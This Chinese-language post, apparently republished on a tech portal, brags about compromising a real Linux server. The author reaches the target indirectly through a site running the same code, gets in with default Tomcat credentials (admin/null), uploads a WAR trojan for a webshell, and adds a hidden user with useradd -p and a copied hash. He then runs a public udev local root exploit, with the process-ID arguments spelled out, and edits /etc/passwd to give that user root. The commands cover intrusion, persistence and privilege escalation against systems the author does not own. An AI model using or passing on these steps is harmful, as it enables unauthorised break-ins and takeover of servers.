扫一扫
分享文章到微信
扫一扫
关注官方公众号
至顶头条
今天成功利用udev搞定一个linux肉鸡,爽呀,没想到我的人品已经好到这个地步了……
今天本来和ay520一起检测一个网站的,无奈网站太过去强大,没有发现漏洞,于是我就开始了迂回攻击战术,什么是迂回攻击?我就来小介绍一下:
通常我们攻击一个网站的时候,由于不了解网站源码结构,也没有常见的漏洞,我们就可以先找出这个网站源码的一些特征字符,然后利用google搜索
和这个网站一样源码的站,要攻击的站可能没有漏洞,但是我们搜索到的站不一定没有漏洞,可能是配置上面的问题等,然后加以利用,成功得到shell以后
我们就可以利用shell来查看网站的源码,然后再返回去攻击目标站点,这样就是我所谓的迂回了,当然也可以是社工网站管理员在其它网站或者是论坛上面的
注册用户名和密码然后再回来测试目标站点,最终拿下目标站点就OK了。费话不多说了,下面就开始我今天的入侵渗透之旅了……
由于目标站点没有漏洞,配置上面的漏洞也没有,通过google搜索我找到一个和他一样源码的网站http://www.xxx.com:9999/wcm/loginpage.htm 然后进行了常用密码的
猜解,但是也没有发现弱密码等漏洞,于是去掉wcm以及后面的,直接http://www.xxx.com:9999/ 结果发现是tomcat ,经测试用户名和密码为:admin/null 成功进入以
后上传war木马,最后得到迂回攻击的网站的webshell 运行命令uname -a 得到服务器的内核版本Linux www.xxx.com 2.6.18-
128.el5 #1 SMP Wed Jan 21 10:44:23 EST 2009 i686 i686 i386 GNU/Linux 由于linux的2.6内核出了一个udev本地溢出漏洞,首先看一下webshell的运行权限,命令
id,结果人品爆发了uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) context=user_u:system_r:unconfined_t,是root权
限,既然是root权限,那么我们可以通过webshell来建立一个用户,然后利用putty来连接,进行本地溢出提权……但是通过常用的useradd username添加的用户密码
为空,如果想利用passwd username来设置密码的话,我们的webshell是无法输入密码的,我们就郁闷使用他的参数,-p来操作了,结果搜索运行如下命令:useradd -
p $1$Bj.BPMBM$pr3Vte2A9DW6jCzljcZNT1 liang //-p 后面的一串字符串是我在虚拟机中添加用户,然后复制他的密码来做为这里的密码,这样我就成功添加一个用
户liang 打开putty 然后输入用户名和密码,连接,一切ok,权限为$ 为普通用户,下面就利用udev的溢出来进行提权了。
我本来按照此文所写来进行溢出 http://www.waitalone.cn/post/466.html 结果不成功,经查实,可能是溢出代码有问题,于是我就直接打开
http://www.milw0rm.com/exploits/8478 在putty中运行如下命令:
[liang@www ~]$ vi test 粘贴上面的代码
[liang@www ~]$ wq 保存并退出
[liang@www ~]$chmod 777 test 添加任意用户可执行权限
[liang@www ~]$ps ax|grep udev|grep -v grep|awk {'print $1'} 获得udev进程号,结果为479,然后减1作为test参数
[liang@www ~]$sh test 478 结果返回
sh-3.2$ 返回这个说明不成功,我们多试几次
sh-3.2$ sh test 478 这样我试了三次,还是不行
sh-3.2$ sh test 476 这次成功了,我看到了可爱的#,哈哈 人品爆炸了
然后vi /etc/passwd 把用户名liang的 uid和gid改为0,这样liang 就为root 权限了,哈哈。搞定收工!
如果您非常迫切的想了解IT领域最新产品与技术信息,那么订阅至顶网技术邮件将是您的最佳途径之一。
现场直击|2021世界人工智能大会
直击5G创新地带,就在2021MWC上海
5G已至 转型当时——服务提供商如何把握转型的绝佳时机
寻找自己的Flag
华为开发者大会2020(Cloud)- 科技行者